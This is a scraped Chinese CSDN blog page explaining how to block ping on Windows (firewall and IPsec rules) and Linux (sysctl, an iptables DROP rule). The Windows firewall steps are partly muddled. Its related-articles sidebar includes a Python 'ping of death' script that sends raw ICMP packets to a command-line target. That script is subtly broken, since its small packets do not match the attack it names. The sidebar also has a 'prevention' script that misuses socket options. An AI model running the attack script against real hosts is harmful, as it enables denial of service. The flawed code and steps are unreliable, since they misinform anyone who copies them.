如何设置防Ping

最新推荐文章于 2024-09-26 22:40:01 发布
最新推荐文章于 2024-09-26 22:40:01 发布
阅读量382 收藏 5
点赞数 2
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sw_feng/article/details/140425400
版权

开启防ping主要是为了增加网络安全,避免不必要的网络探测或潜在的DoS/DDoS攻击。下面是如何在不同操作系统上设置防ping的步骤:

Windows系统

使用防火墙设置防ping
  1. 打开“控制面板”。
  2. 点击“系统和安全”下的“Windows Defender 防火墙”。
  3. 点击左侧的“高级设置”。
  4. 在左侧面板中,点击“入站规则”。
  5. 在右侧点击“新建规则...”。
  6. 在“新建入站规则向导”中,选择“自定义”并点击“下一步”。
  7. 选择“所有程序”并点击“下一步”。
  8. 选择“TCP”或“UDP”(对于ping,实际上是ICMP,所以要选择下一个选项)。
  9. 对于“特定的本地端口”,选择“所有本地端口”并点击“下一步”。
  10. 选择“阻止连接”并点击“下一步”。
  11. 选择“所有配置文件”(域、专用和公用)并点击“下一步”。
  12. 给规则命名并描述,例如“防ping规则”。
  13. 完成向导并关闭防火墙设置。
使用IP安全策略设置防ping
  1. 按下Win+R键,输入gpedit.msc打开组策略编辑器。
  2. 导航至“计算机配置” > “Windows设置” > “安全设置” > “IP安全策略”。
  3. 右键点击空白处,选择“创建IP安全策略”。
  4. 按照向导设置名称和描述,例如“禁止ping”。
  5. 在“规则”选项页中添加新的IP筛选器和筛选器操作,选择“要求安全”。
  6. 设置IP筛选器为ICMP协议,源地址为“我的IP地址”,目标地址为“任何IP地址”。
  7. 保存设置。

Linux系统

使用sysctl设置防ping
  1. 打开终端。
  2. 编辑/etc/sysctl.conf文件(使用sudo nano /etc/sysctl.confsudo vim /etc/sysctl.conf)。
  3. 在文件末尾添加一行:net.ipv4.icmp_echo_ignore_all = 1
  4. 保存并关闭文件。
  5. 输入sudo sysctl -p使更改立即生效。
使用iptables设置防ping
  1. 打开终端。
  2. 输入sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP来阻止所有ICMP echo请求(即ping)。
  3. 若要让更改永久生效,你可能需要将规则保存到iptables配置文件中,这取决于你的Linux发行版。

罗西丷
关注
专栏目录
Ping方法汇总!(转)
linleiqin
04-03 815
Ping方法汇总!(转)一、用高级设置法预Ping 默认情况下,所有Internet控制消息协议(ICMP)选项均被禁用。如果启用ICMP选项,您的网络将在 Internet 中是可视的,因而易于受到攻击。 如果要启用ICMP,必须以管理员或Administrators 组成员身份登录计算机,右击“网上邻居”,在弹出的快捷菜单中选择“属性”即打开了“网络连接”,选定已启用Interne
止别人ping自己电脑的方法
09-26
Windows中利用安全策略止别人ping自己的电脑。
大幅降低服务器攻击流量风险一键禁止ping操作
wing_77的博客
07-27 806
一旦服务器接入互联网,便无时无刻不面临着黑客的扫描和潜在攻击。攻击者常常使用ping命令来探测服务器的在线状态,进而发动攻击。本文将介绍两种方法:修改内核参数和配置火墙,以在Linux系统中实现禁止被pingPing命令是网络诊断的基本工具,通过ICMP协议检测主机间的连通性。但出于安全考虑,我们可能需要禁止未授权的ping操作。本文介绍的方法适用于希望隐藏服务器在线状态,减少被攻击风险的场景。对于面向公众的服务器,建议禁用ping功能;若需更精细的控制,可以通过配置火墙实现。
windows火墙禁止ping步骤
weixin_51945169的博客
04-11 882
Windows火墙 --> 高级设置 --> 入站规则 --> 在列表里找到“文件和打印机共享(回显请求 - ICMPv4-In)” --> 右击选择启用规则,并在其属性里设置为‘允许连接'--> 确定 --> 大功告成。配置完成后,别人就无法ping通你了,你仍然可以去ping做通的网络资源(在别人没有开启禁止ping策略的前提下)要禁止ping,去掉勾选即可.
Ping二法
老刀专栏
09-15 1884
一、使用路由和远程访问服务PingPing命令通常被用来测试网络的连接情况,是网管必须掌握的命令。但也有很多人把它当做攻击服务器的武器,因此许多网络管理员都在服务器上做了Ping措施。Ping的方法非常多,如利用IP安全策略、网络火墙等,其中使用路由和远程访问服务器是最有效的方法之一。笔者以Windows Server 2003为例,为大家介绍如何使用路由和远程访问服务器Ping。第一步
计算机ping取消,如何止别人ping自己局域网电脑
weixin_39811478的博客
07-27 793
有时我们需要将自己的电脑在局域网中隐藏起来,那么你知道如何止别人ping自己局域网电脑吗?下面是学习啦小编整理的一些关于止别人ping自己局域网电脑的相关资料,供你参考。止别人ping自己局域网电脑的方法:打开本地计算机的cmd命令行,可查看本地计算机在局域网中的IP地址。如下图。2查出本地计算机的IP地址后,在局域网另外一台电脑上对本地计算机实施ping操作,看是否可以ping通。局域网另...
ping,我们可以使用telnet,nc,nmap 命令来实现
一天不写代码难受的博客
05-20 1050
在这个示例中,我们使用 telnet 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。在这个示例中,我们使用 nmap 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。nmap 命令是一个网络扫描工具,可以用于扫描网络上的主机和端口,也可以用于测试两个服务器之间的网络连接。在这个示例中,我们使用 nc 命令测试 SERVER1 到 SERVER2 和 SERVER2 到 SERVER1 的连接。
ping端口检测工具.zip
07-11
在“ping端口检测工具”中,用户可能能够设置自定义的端口范围进行扫描,或者选择特定的端口进行测试。工具可能还会显示每个端口的状态、服务名、协议类型以及响应时间。此外,它可能具有报警功能,当发现异常活动...
网站Ping方法汇总
04-13
### 网站Ping方法汇总 #### 一、理解Ping命令及原理 Ping命令是网络测试中最常用的一种工具,其工作原理主要是通过发送ICMP(Internet Control Message Protocol)请求包来检测网络连通性。当发出Ping命令时,...
火墙禁Ping设置.pdf
01-05
火墙禁Ping设置 火墙禁Ping设置是指对 ICMP 协议的限制和过滤,以避免黑客攻击和非法入侵。ICMP 协议是一种无连接的协议,它可以被轻易伪造,从而带来安全隐患。 ICMP 协议的特点是它可以被伪造,黑客可以伪造...
PingTool服务器网络ping监测工具
09-23
2. **自定义设置**:用户可以根据需求定制监测频率,设置ping包的数量,以及调整日志记录的大小范围,以适应不同场景下的监控需求。 3. **日志记录**:该工具提供详细的日志记录功能,记录每次ping操作的结果,包括...
XPing XPing(Ping工具) v3.0.0.517
10-15
还有警报设置,当网络条件达到预设阈值时,XPing可自动触发通知,提醒用户及时处理问题。 在启安上网行为管理系统中,XPing作为内置工具,可以帮助管理者监控网络性能,确保系统的稳定运行,预并解决网络连接问题...
Windows服务器禁用ping功能
2401_84084080的博客
08-12 1180
windows服务器通过三种方式禁止外部对其ping测试
计算机ping取消,如何止别人ping通本地电脑
weixin_32521765的博客
07-27 590
局域网中的电脑无法通过ping命令来得到本地的imcp数据包,也就是无法通过ping命令查看本地计算机是否存活,当对方无法ping同本地电脑后,就会认为本地计算机不存在或者关机了,下面学习啦小编就来讲解一下如何操作设置止别人ping通本地电脑。止别人ping通本地电脑的方法打开本地计算机的cmd命令行,可查看本地计算机在局域网中的IP地址。如下图。2查出本地计算机的IP地址后,在局域网另外一台...
路由PING
weixin_33850890的博客
05-13 226
实验,路由ping 1.先制作静态路由2003通过LINUX路由访问 LINUX 2.LINUX路由: #编辑网卡文件vi /etc/sysconfig/network-script/ifcfg-eth1 #然后再修改sysctl.conf文件。这个文件就是LINUX的IP转发文件。在这里我们一定要起用IP转发才可以...
Linuxping处理
weixin_45732391的博客
08-18 306
代码】Linuxping处理。
如何配置Windows火墙以允许特定端口访问并禁止ping
最新发布
modaner的博客
09-26 513
网络安全日益重要的今天,合理配置火墙是保护系统安全的重要步骤之一。本文将指导您如何在Windows系统中配置火墙,以允许3389、8080、80和443端口的访问,同时禁止对ICMPv4协议(即ping)的响应以及其他端口的访问。
Wifi adb 操作步骤
赵撵猪的博客
11-29 2546
无线adb使用
ping of death 攻击代码 Python
08-13
### 回答1: 以下是一个Python的ping-of-death攻击脚本示例: ```python import os import sys import random import socket import struct def checksum(data): n = len(data) m = n % 2 sum = 0 for i in range(0, n - m, 2): sum += (data[i]) + ((data[i+1]) << 8) if m: sum += (data[-1]) sum = (sum >> 16) + (sum & 0xffff) sum += (sum >> 16) answer = ~sum & 0xffff answer = answer >> 8 | (answer << 8 & 0xff00) return answer def create_packet(): header = struct.pack('!BBHHH', 8, 0, 0, random.randint(0, 65535), 0) data = 'x'*192 chksum = checksum(header + data.encode('utf-8')) header = struct.pack('!BBHHH', 8, 0, chksum, random.randint(0, 65535), 0) packet = header + data.encode('utf-8') return packet def ping_of_death(target, count): for i in range(count): packet = create_packet() sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) sock.sendto(packet, (target, 0)) print(f'Sent {len(packet)} bytes to {target}') sock.close() if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python ping_of_death.py <target> [count]') sys.exit(1) target = sys.argv[1] count = int(sys.argv[2]) if len(sys.argv) > 2 else 1 ping_of_death(target, count) ``` 注意:ping-of-death攻击是非法的,并且可能会导致目标系统的崩溃。本示例代码仅供学习和研究之用,不应用于非法活动。 ### 回答2: Ping of Death攻击代码Python的关键是通过一些方法来检测和处理大尺寸的IPv4 ICMP封包。以下是一个简单的Python代码示例,可用于Ping of Death攻击: ```python import os import struct import socket # 定义Ping of Death攻击的函数 def prevent_ping_of_death(): # 创建原始套接字 raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) # 设置IP头中的“不分片”标识位 raw_socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) # 获取当前系统的最大IP数据包大小 max_packet_size = socket.IP_MTU # 通过循环不断接收并处理封包 while True: packet, addr = raw_socket.recvfrom(max_packet_size) # 在接收到的封包数据中解析IP头部,并检查是否超过最大尺寸 ip_header = packet[0:20] iph = struct.unpack('!BBHHHBBH4s4s', ip_header) total_length = iph[2] if total_length > max_packet_size: print("检测到Ping of Death攻击,已御!") # 处理正常的封包,例如转发或者解析数据 # ... ``` 此代码主要作用是创建一个原始套接字,然后设置IP头部的“不分片”标识位。然后,通过循环接收和处理接收到的封包,并解析IP头部以获取封包的长度。如果封包长度超过了系统最大IP数据包的大小,就说明可能收到了Ping of Death攻击,并在控制台输出相应的警告信息。 需要注意的是,此代码只是一个基本示例,可以根据实际情况进行进一步的优化和完善。Ping of Death攻击还有其他更复杂的方法,例如使用火墙规则、流量控制和过滤等。 ### 回答3: ping of death攻击代码Python的方法有很多,以下是其中一种常见的御策略: 首先,可以使用Python中的socket模块来实现网络连接的建立和数据的传输。在代码中创建一个Socket对象,并设置相关参数,如IP和端口。 接下来,可以使用try-except语句块来捕获可能发生的异常,并设置超时时间来限制请求的处理时间。 然后,可以使用循环语句来进行持续的监听和处理请求,以止服务器的负载过高。同时,可以设置最大连接数的限制,以止攻击者通过大量的请求造成服务器资源耗尽。 另外,还可以使用火墙工具来限制ICMP数据包的大小,以止攻击者发送过大的数据包导致的拒绝服务攻击。可以使用Python的subprocess模块来调用操作系统的火墙命令,如iptables。 此外,可以使用网络流量分析工具来监测并过滤掉异常请求,从而提高系统的安全性。可以使用Python中的第三方库,如scapy来实现网络流量分析功能。 最后,可以定期更新和升级服务器的操作系统和网络设备的软件版本,以修复可能存在的安全漏洞。 需要注意的是,以上只是其中一种ping of death攻击的方法,具体的御策略还需要根据实际情况进行调整和优化。同时,在编写代码时,还需要遵循良好的编程规范和安全编码的原则,确保代码的可靠性和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值